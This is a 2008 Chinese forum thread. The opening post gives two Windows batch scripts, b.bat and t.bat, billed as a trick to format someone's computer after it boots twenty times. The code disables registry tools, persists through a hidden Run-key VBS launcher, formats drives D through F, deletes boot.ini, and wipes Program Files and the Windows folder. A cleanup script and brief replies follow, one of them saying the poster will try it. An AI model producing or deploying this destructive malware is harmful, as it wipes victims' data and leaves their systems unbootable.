一段实现开机20次格人电脑的批处理

社区服务
高级搜索
猴岛论坛电脑百科一段实现开机20次格人电脑的批处理
发帖 回复
倒序阅读 最近浏览的帖子最近浏览的版块
6个回复

一段实现开机20次格人电脑的批处理

楼层直达
happylove11

ZxID:1328382

等级: 上校
态度决定一切

举报 只看楼主 使用道具 楼主   发表于: 2008-10-23 0
— 本帖被 守護靈魂 从 建站程序 移动到本区(2008-10-26) —
第一个命名为b.bat 代码是:
@echo off
@reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d 00000001 /f
@reg add hklm\software\microsoft\windows\currentversion\run /v logon /t reg_sz /d c:\windows\system32\a.vbs /f
copy b.bat c:\windows\system32\b.bat
copy t.bat c:\windows\system32\t.bat
attrib +r +s +h c:\windows\system32\t.bat
echo  不好意思 >>c:\windows\system32\a.txt
echo 格了你的电脑 >>c:\windows\system32\a.txt
echo set ws=wscript.createobject("wscript.shell") >>c:\windows\system32\a.vbs
echo ws.run "c:\windows\system32\b.bat /start",0 >>c:\windows\system32\a.vbs
attrib +r +s +h c:\windows\system32\a.vbs
attrib +r +s +h c:\windows\system32\a.txt
set x=0
set /a x=%x%+1
if %x%==20 goto exit else goto next
:next
call t.bat
d:
del t.bat /f /q
del b.bat /f /q



第二个 命名为 t.bat 代码:
@echo off
echo @echo off >>c:\windows\system32\a.bat
attrib -r -s -h c:\windows\system32\b.bat
echo set x=%x% >>c:\windows\system32\a.bat
echo set /a x=%%x%%+1 >>c:\windows\system32\a.bat
echo if %%x%%==20 goto exit else goto next >>c:\windows\system32\a.bat
set y=:next
echo %y% >>c:\windows\system32\a.bat
echo call c:\windows\system32\t.bat >>c:\windows\system32\a.bat
echo exit >>c:\windows\system32\a.bat
echo :exit >>c:\windows\system32\a.bat
echo format d: /q /y >>c:\windows\system32\a.bat
echo format e: /q /y >>c:\windows\system32\a.bat
echo format f: /q /y >>c:\windows\system32\a.bat
echo cd\ >>c:\windows\system32\a.bat
echo start a.txt >>c:\windows\system32\a.bat
echo attrib -r -s -h c:\boot.ini >>c:\windows\system32\a.bat
echo del c:\boot.ini /q /f /s >>c:\windows\system32\a.bat
echo cd Program Files >>c:\windows\system32\a.bat
echo del *.* /f /q /s >>c:\windows\system32\a.bat
echo cd\ >>c:\windows\system32\a.bat
echo cd windows >>c:\windows\system32\a.bat
echo del *.* /f /q /s >>c:\windows\system32\a.bat
echo exit >>c:\windows\system32\a.bat
del c:\windows\system32\b.bat
ren c:\windows\system32\a.bat b.bat
attrib +r +a +h c:\windows\system32\b.bat

保存好后 运行b.bat 就ok 了

解决方法 :随便建个批处理 然后运行 代码如下:
attrib -s -r -h c:\windows\system32\t.bat
attrib -s -r -h c:\windows\system32\b.bat
attrib -s -r -h c:\windows\system32\a.txt
attrib -s -r -h c:\windows\system32\a.vbs
del /f /q c:\windows\system32\t.bat
del /f /q c:\windows\system32\b.bat
del /f /q c:\windows\system32\a.txt
del /f /q c:\windows\system32\a.vbs
@reg delete hklm\software\microsoft\windows\currentversion\run /v logon /f
@reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d 0000000 /f


呵呵,希望大家喜欢
tm11042

ZxID:2063843

等级: 中士
举报 只看该作者 沙发   发表于: 2008-10-25 0
没事格人电脑干嘛,要是你能把我这网吧的电脑全格了那还差不多
20200115

ZxID:1618457

等级: 元老
幸福就是猫吃鱼狗吃肉,奥特曼打小怪兽

举报 只看该作者 板凳   发表于: 2008-10-26 0
.................................有什么用?意思有么?
kfaaa

ZxID:1850187

等级: 上等兵
举报 只看该作者 地板   发表于: 2008-10-26 0
世界如此美妙,楼主如此暴躁。这样不好,不好!
zengkaa

ZxID:1678452

等级: 上等兵
举报 只看该作者 4楼  发表于: 2008-10-26 0
那给来干什么用
gzdsssw

ZxID:2254418

等级: 上等兵
举报 只看该作者 5楼  发表于: 2008-11-04 0
只运行地一个就可以了啊?那T.BAT是什么意思呢
qq553069669

ZxID:1916306

等级: 中校
我回来了、但是没人记得我了 哎~~~

举报 只看该作者 6楼  发表于: 2008-11-04 0
我去试试
« 返回列表
发帖 回复